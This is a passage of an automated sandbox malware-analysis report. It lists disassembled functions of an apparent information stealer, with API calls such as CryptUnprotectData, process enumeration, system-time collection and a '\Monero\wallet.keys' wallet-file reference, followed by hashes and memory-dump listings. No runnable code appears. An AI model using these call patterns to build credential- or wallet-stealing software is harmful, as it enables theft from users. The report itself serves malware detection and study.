                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00C20D73), ref: 00C0E4A2
                  • StrCmpCA.SHLWAPI(?,00C214F8), ref: 00C0E4F2
                  • StrCmpCA.SHLWAPI(?,00C214FC), ref: 00C0E508
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00C0EBDF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                  • String ID: \*.*
                  • API String ID: 433455689-1173974218
                  • Opcode ID: 7d0bf85de9fb334d29a734f78386324fc7a152d45c722610b8e593dafc87a976
                  • Instruction ID: f6efa2248dac95e825c09b433d6d11dfd19ae79217418ce189bf6622e74a910e
                  • Opcode Fuzzy Hash: 7d0bf85de9fb334d29a734f78386324fc7a152d45c722610b8e593dafc87a976
                  • Instruction Fuzzy Hash: 3D1270319111189AEB14FB60DD96EED7338AF55310F4045A9B50AA21D1EF30AFCAFF92
                  Function 00FCE173 Relevance: 7.9, Strings: 5, Instructions: 1696COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: >2x.$BA}$Fd1$Q:=k$d_}
                  • API String ID: 0-456034590
                  • Opcode ID: 1bea64c7b3492bfd65397a3ab01618cdbeed31bfef8ec5d9fbe06d43732ea9c6
                  • Instruction ID: a7d28e491b4677335d97985e01620d43ebc4392a8bd5e7d1f7dc5870f68f8397
                  • Opcode Fuzzy Hash: 1bea64c7b3492bfd65397a3ab01618cdbeed31bfef8ec5d9fbe06d43732ea9c6
                  • Instruction Fuzzy Hash: 28B227F36082049FE3046E2DEC8577AFBE9EF94720F1A4A3DE6C4C7744E63598058696
                  Function 00C0C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                  Download Yara Rule
                  APIs
                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00C0C871
                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00C0C87C
                  • lstrcat.KERNEL32(?,00C20B46), ref: 00C0C943
                  • lstrcat.KERNEL32(?,00C20B47), ref: 00C0C957
                  • lstrcat.KERNEL32(?,00C20B4E), ref: 00C0C978
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$BinaryCryptStringlstrlen
                  • String ID:
                  • API String ID: 189259977-0
                  • Opcode ID: 92500f207fcf3c396125db418d17130fe3055c495fa9301e7edad6a5a8843224
                  • Instruction ID: cf6d817a982392f16ddb17e15db665fc1918ed3529d407eb73280c5be0510119
                  • Opcode Fuzzy Hash: 92500f207fcf3c396125db418d17130fe3055c495fa9301e7edad6a5a8843224
                  • Instruction Fuzzy Hash: 43416EB9944219DFDB10CFA0DC89BFEB7B8AB48304F1442B8E509A6280D7745B85CF92
                  Function 00C07240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00C0724D
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00C07254
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00C07281
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00C072A4
                  • LocalFree.KERNEL32(?), ref: 00C072AE
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                  • String ID:
                  • API String ID: 2609814428-0
                  • Opcode ID: a61b5796d861feb0c0e78f2f45ad6d823536093d606199dd7f5b914dd0f79400
                  • Instruction ID: e773d07a11496bbfe0d19bc987aee2a762bd7fcd10b8945c2f8289fd841f21c6
                  • Opcode Fuzzy Hash: a61b5796d861feb0c0e78f2f45ad6d823536093d606199dd7f5b914dd0f79400
                  • Instruction Fuzzy Hash: 21014CB5A80208BFEB14DFD4DD4AF9E77B8EB48B00F104155FB05BA2C0C6B0BA058B65
                  Function 00C19600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                  Download Yara Rule
                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C1961E
                  • Process32First.KERNEL32(00C20ACA,00000128), ref: 00C19632
                  • Process32Next.KERNEL32(00C20ACA,00000128), ref: 00C19647
                  • StrCmpCA.SHLWAPI(?,00000000), ref: 00C1965C
                  • CloseHandle.KERNEL32(00C20ACA), ref: 00C1967A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                  • String ID:
                  • API String ID: 420147892-0
                  • Opcode ID: 47efde2b105272bd9701dcb058f02f06efb09c47942a99791e4c57d4ec1dfbe2
                  • Instruction ID: ac91cbc05b3dbb938bf0d58d06ab06cfa210f2815dc3f5aab757eefc010df064
                  • Opcode Fuzzy Hash: 47efde2b105272bd9701dcb058f02f06efb09c47942a99791e4c57d4ec1dfbe2
                  • Instruction Fuzzy Hash: DD014CB9A40208AFCB24DFA6CC58BEDB7F8EB09310F004198B909A6240D7349B85DF61
                  Function 00C18680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00C205B7), ref: 00C186CA
                  • Process32First.KERNEL32(?,00000128), ref: 00C186DE
                  • Process32Next.KERNEL32(?,00000128), ref: 00C186F3
                    • Part of subcall function 00C1A9B0: lstrlen.KERNEL32(?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C1A9C5
                    • Part of subcall function 00C1A9B0: lstrcpy.KERNEL32(00000000), ref: 00C1AA04
                    • Part of subcall function 00C1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C1AA12
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                  • CloseHandle.KERNEL32(?), ref: 00C18761
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                  • String ID:
                  • API String ID: 1066202413-0
                  • Opcode ID: 3b6aec90458e40eb4557acfc97c204de0bfaa733b60ee976ca4181b162f6f429
                  • Instruction ID: 1a5211f5073f3cd037f096620e1c3f7d949c23db59255d8db7140b9847eda108
                  • Opcode Fuzzy Hash: 3b6aec90458e40eb4557acfc97c204de0bfaa733b60ee976ca4181b162f6f429
                  • Instruction Fuzzy Hash: E2316F71902218ABDB24DF51DC45FEEB778EB46710F1041A9F10AA2190DB306B8ADFA1
                  Function 00C18EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                  Download Yara Rule
                  APIs
                  • CryptBinaryToStringA.CRYPT32(00000000,00C05184,40000001,00000000,00000000,?,00C05184), ref: 00C18EC0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: BinaryCryptString
                  • String ID:
                  • API String ID: 80407269-0
                  • Opcode ID: a174aca861ba678df22841f722bf13a12102d09178bf0e7f839a770c6b421037
                  • Instruction ID: 596f51cbb83eaa97b283029b955f4bf82a3a20bbdf1ffafc21cc63b2ce944f6c
                  • Opcode Fuzzy Hash: a174aca861ba678df22841f722bf13a12102d09178bf0e7f839a770c6b421037
                  • Instruction Fuzzy Hash: E5112E74204204FFDB04CFA5D884FA733AAEF8A310F149458F9198B250DB35ED8AEB60
                  Function 00C09AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                  Download Yara Rule
                  APIs
                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C04EEE,00000000,00000000), ref: 00C09AEF
                  • LocalAlloc.KERNEL32(00000040,?,?,?,00C04EEE,00000000,?), ref: 00C09B01
                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C04EEE,00000000,00000000), ref: 00C09B2A
                  • LocalFree.KERNEL32(?,?,?,?,00C04EEE,00000000,?), ref: 00C09B3F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: BinaryCryptLocalString$AllocFree
                  • String ID:
                  • API String ID: 4291131564-0
                  • Opcode ID: 025d860b5bc57b05bcbb27c4c8ab3288e05f3f3215a0648338b07b409c206815
                  • Instruction ID: 6305fd76d97f6ca2b3a41560bfa6c2549f0738fc0a887f2e9811da6dfde3d701
                  • Opcode Fuzzy Hash: 025d860b5bc57b05bcbb27c4c8ab3288e05f3f3215a0648338b07b409c206815
                  • Instruction Fuzzy Hash: 9F11A4B4240208AFEB14CF64DC95FAA77B5FB89714F208058F9159B3D0C776AA01CB50
                  Function 00C17980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00C20E00,00000000,?), ref: 00C179B0
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00C179B7
                  • GetLocalTime.KERNEL32(?,?,?,?,?,00C20E00,00000000,?), ref: 00C179C4
                  • wsprintfA.USER32 ref: 00C179F3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                  • String ID:
                  • API String ID: 377395780-0
                  • Opcode ID: 01eb09d46fd38195af334777ec6b76400d76394de0fa4ff7b3a80678ff779040
                  • Instruction ID: 65d78f5e179d9d77037f05be7dd1a904d52f81fe804dd710d2b0b179c505727c
                  • Opcode Fuzzy Hash: 01eb09d46fd38195af334777ec6b76400d76394de0fa4ff7b3a80678ff779040
                  • Instruction Fuzzy Hash: BC115AB2944118ABCB14DFCADD44BBEB7F8FB4DB21F04425AF601A2280D2385945D7B1
                  Function 00C17A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0179E5A0,00000000,?,00C20E10,00000000,?,00000000,00000000), ref: 00C17A63
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00C17A6A
                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0179E5A0,00000000,?,00C20E10,00000000,?,00000000,00000000,?), ref: 00C17A7D
                  • wsprintfA.USER32 ref: 00C17AB7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                  • String ID:
                  • API String ID: 3317088062-0
                  • Opcode ID: 61239965a644753de57936ef884cc266facbd9dc3465618a8ffbb87d4c9ae2dd
                  • Instruction ID: 15372d05f1b89b53f0c9fa75e9ca775c0cafb5ac59cd8cf34d335da45669a772
                  • Opcode Fuzzy Hash: 61239965a644753de57936ef884cc266facbd9dc3465618a8ffbb87d4c9ae2dd
                  • Instruction Fuzzy Hash: 861182B1945228DFEB148F55DC49F99B778FB05721F1043A6E516A32C0C7741A84DF51
                  Function 00FCC672 Relevance: 5.4, Strings: 3, Instructions: 1611COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: )P+~$:>Go$v7
                  • API String ID: 0-253929147
                  • Opcode ID: bd4b9bc3a0621b8f51dc131d69011f16a920965228dae0118b3031ea7eee1b8d
                  • Instruction ID: 9cbb521d6fa5ae00023f92f3cfb101c14b770f1992536d462cebb89b0d51346f
                  • Opcode Fuzzy Hash: bd4b9bc3a0621b8f51dc131d69011f16a920965228dae0118b3031ea7eee1b8d
                  • Instruction Fuzzy Hash: 61B218F36082049FE304AE2DDC8567AF7EAEFD4720F1A893DE6C4C3744EA3558158696
